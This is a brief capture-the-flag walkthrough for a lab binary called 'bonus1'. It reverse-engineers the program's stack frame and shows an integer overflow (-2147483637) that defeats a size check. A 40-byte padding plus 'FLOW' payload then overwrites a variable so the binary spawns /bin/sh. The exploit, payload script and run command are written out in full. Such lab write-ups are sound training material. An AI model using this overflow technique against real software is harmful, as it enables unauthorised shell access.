
#> strings bonus1
execl
memcpy
atoi
/bin/sh

Reverse engineering the binary:
<main> Stack Frame:
	char	buffer[40]
	int		n = atoi(argv[1])

For the binary to execl("/bin/sh")
n == 1464814662 == "FLOW" --> true

but to get there:
if (n <= 9)
	n *= 4;
	memcpy(buf, argv[2], n)

The trick is to get n*4 == 44 without n > 9

We are going to overflow n to make a negative interger
become a positive interger by droping it's sign bit.

n = (1 << 31) + 11 = -2147483637

Thus:
number = "-2147483637"
BoF = "A"*40 + "FLOW"
print number + " " + BoF

#> ./bonus1 $(python flow.py)

